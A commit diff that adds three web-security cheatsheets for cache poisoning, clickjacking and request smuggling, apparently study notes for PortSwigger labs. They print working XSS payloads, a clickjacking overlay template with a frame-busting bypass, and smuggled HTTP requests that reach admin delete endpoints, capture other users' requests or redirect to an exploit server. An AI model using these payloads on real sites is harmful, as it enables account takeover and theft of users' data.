add cache poisoning, clickjacking & request smuggling

xanhacks · Dec 13, 2022 · e780a02 · e780a02
1 parent ff59e35
commit e780a02
Show file tree

Hide file tree

Showing 3 changed files with 262 additions and 0 deletions.
diff --git a/docs/web/cache-poisoning.md b/docs/web/cache-poisoning.md
@@ -0,0 +1,36 @@
+---
+title: Cache poisoning
+description: Web cache poisoning cheatsheet
+---
+
+# Web cache poisoning
+
+## Definition
+
+**Web cache poisoning** is a type of cyber attack that targets the cache of a web server or web browser. The goal of this attack is to **inject malicious or unauthorized content into the cache**, so that it is served to users who request the same content in the future. This can be used to spread malware or to trick users into visiting malicious websites, for example.
+
+## Cheatsheet
+
+- Cache Host header to control $URL/resources/...
+- Cache cookie to control pages content (language=fr)
+- `GET /resources/js/tracking.js` and `X-Forwarded-Host` to redirect to my exploit server
+- `Vary` header provides list of cache key header
+    - If User-Agent in Vary, try to capture it (ex: load image to your website) or BF UA
+- Unkeyed query string : `GET /?'><script>alert(1)</script>` or param `/?utm_content='%3e%3cscript%3ealert(1)%3c%2fscript%3e`
+- Parameter cloacking `/js/geolocate.js?callback=setCountryCookie&utm_content=toto;callback=eval(alert(1))%3bconsole.log` will serve `/js/geolocate.js?utm_content=toto&callback=eval(alert(1))%3bconsole.log`. You need a param that will be removed from the cache
+- GET request with body
+
+```
+GET /js/geolocate.js?callback=setCountryCookie HTTP/1.1
+Host: xxx.web-security-academy.net
+X-HTTP-Method-Override: POST
+[...]
+
+callback=alert(1);console.log
+```
+
+- URL normalization : caching `/notfound<script>alert(1)</script>` into `/notfound%3Cscript%3Ealert(1)%3C/script%3E`
+
+## References
+
+- [PortSwigger - Web Cache Poisoning](https://portswigger.net/web-security/web-cache-poisoning)
diff --git a/docs/web/clickjacking.md b/docs/web/clickjacking.md
@@ -0,0 +1,60 @@
+---
+title: Clickjacking
+description: Clickjacking cheatsheet
+---
+
+# Clickjacking
+
+## Definition
+
+**Clickjacking**, also known as "UI redress attack" or "user interface redress attack," is a type of cyber attack where a malicious website or ad is designed to **trick users into clicking on something** other than what they think they are clicking on. This can be used to steal sensitive information, such as login credentials or personal information, or to perform actions on the user's behalf without their knowledge or consent.
+
+## Cheatsheet
+
+```html
+<head>
+<style>
+#victim_website {
+	position:relative;
+	width:700px;
+	height:520px;
+	opacity:0.20;
+	z-index:2;
+}
+#malicious_overlay {
+	position:absolute;
+	top:495px;
+	left:70px;
+	z-index:1;
+}
+</style>
+</head>
+<body>
+	<div id="malicious_overlay">
+	    <button>click</button>
+	</div>
+        <iframe id="victim_website" src="https://example.com/my-account"></iframe>
+</body>
+```
+
+- Prefilled input : https://example.com/my-account?**[email protected]**
+- Bypass JS script that block iframe like :
+
+```html
+<script>
+if(top != self) {
+    window.addEventListener("DOMContentLoaded", function() {
+        document.body.innerHTML = 'This page cannot be framed';
+    }, false);
+}
+</script>
+```
+
+Use iframe `sandbox` attribute ([list](https://www.w3schools.com/tags/att_iframe_sandbox.asp)). Like `<iframe id="victim_website" sandbox="allow-forms" src="https://example.com/[email protected]"></iframe>`.
+
+- XSS that need a click (so use Clickjacking to do the action)
+- Mutlistep clickjacking (click on 2 buttons, use 2 overlays)
+
+## References
+
+- [PortSwigger - Clickjacking](https://portswigger.net/web-security/clickjacking)
diff --git a/docs/web/request-smuggling.md b/docs/web/request-smuggling.md
@@ -0,0 +1,166 @@
+---
+title: Request Smuggling
+description: Request Smuggling cheatsheet
+---
+
+# Request Smuggling
+
+## Definition
+
+**Request smuggling** is a type of cyber attack that exploits vulnerabilities in the way that web servers and other network components handle incoming requests. This attack involves sending multiple requests to a web server or other network component in a way that is intended to bypass security measures or to **interfere with the normal processing of the requests**. The goal of this attack is to gain unauthorized access to sensitive information or to perform other malicious actions.
+
+## Potential impacts
+
+- Capture request from other users
+- Bypass frontend control
+- Spread malicious response to users
+    - XSS reflected
+    - HTTP Redirection to vuln page
+
+## CL.TE
+
+Check if the vuln exists by looking for 404 response :
+
+```
+POST / HTTP/1.1
+Host: 0a9000ba04ae672ec05a30930069004c.web-security-academy.net
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 26
+Transfer-Encoding: chunked
+Connection: keep-alive
+
+0
+
+GET /404 HTTP/1.1
+X-Ignore:
+```
+
+Reflected XSS via Smuggling :
+
+```
+POST / HTTP/1.1
+Host: 0ac100440421efb2c002ce00008700bc.web-security-academy.net
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 150
+Transfer-Encoding: chunked
+
+0
+
+GET /post?postId=4 HTTP/1.1
+Host: 0ac100440421efb2c002ce00008700bc.web-security-academy.net
+User-Agent: M"><script>alert(1)</script>
+X-Ignore:
+```
+
+To bypass duplicates error problem, the rest of the request will be in the params :
+
+```
+POST / HTTP/1.1
+Host: 0a4000100459fd34c15c7dfe00be003a.web-security-academy.net
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 139
+Transfer-Encoding: chunked
+
+0
+
+GET /admin/delete?username=carlos HTTP/1.1
+host: localhost
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 10
+
+x=
+```
+
+Exfiltrate data using reflected HTTP params :
+
+```
+POST / HTTP/1.1
+Host: vulnerable-website.com
+Content-Length: 130
+Transfer-Encoding: chunked
+
+0
+
+POST /login HTTP/1.1
+Host: vulnerable-website.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 100
+
+email=POST /login HTTP/1.1
+Host: vulnerable-website.com
+...
+```
+
+## TE.CL
+
+> Use extension HTTP Request Smuggling
+
+```
+POST /search HTTP/1.1
+Host: vulnerable-website.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 4
+Transfer-Encoding: chunked
+
+7c
+GET /404 HTTP/1.1
+Host: vulnerable-website.com
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 144
+
+x=
+0
+```
+
+## HTTP/2 Downgrading
+
+> Create & modify HTTP/2 request using Inspector.
+> Shift + Enter to insert new line
+
+Inject HOST based redirection response.
+
+```
+POST / HTTP/1.1
+Host: 0ae700f90344dd30c0a54a7100b70046.web-security-academy.net
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 0
+
+GET /resources HTTP/1.1
+Host: exploit-0a1500d60306ddd9c0be4a1d01ce00ad.exploit-server.net
+Content-Length: 15
+
+x=1
+```
+
+CRLF in request header / HTTP request splitting, to capture others request (HTTP2 downgrading will add \r\n\r\n at the end of the request) :
+
+```
+HTTP2 REQUEST
+Foo: toto\r\n
+\r\n
+GET /x HTTP/1.1\r\n
+Host: 0a4600d80454afd4c0f201b000a200a4.web-security-academy.net
+```
+
+## CL.0
+
+Find endpoint that is not supposed to handle POST requests like static files.
+
+Send in single connection :
+
+```
+POST /resources/images/avatarDefault.svg HTTP/1.1
+Host: 0a0600840320f8a1c184ace600510049.web-security-academy.net
+Content-Type: application/x-www-form-urlencoded
+Connection: keep-alive
+Content-Length: 100
+
+GET /admin HTTP/1.1
+Foo: x
+```
+
+And another request on `GET /`, and voilà, you bypassed the frontend !
+
+## References
+
+- [PortSwigger - Request Smuggling](https://portswigger.net/web-security/request-smuggling)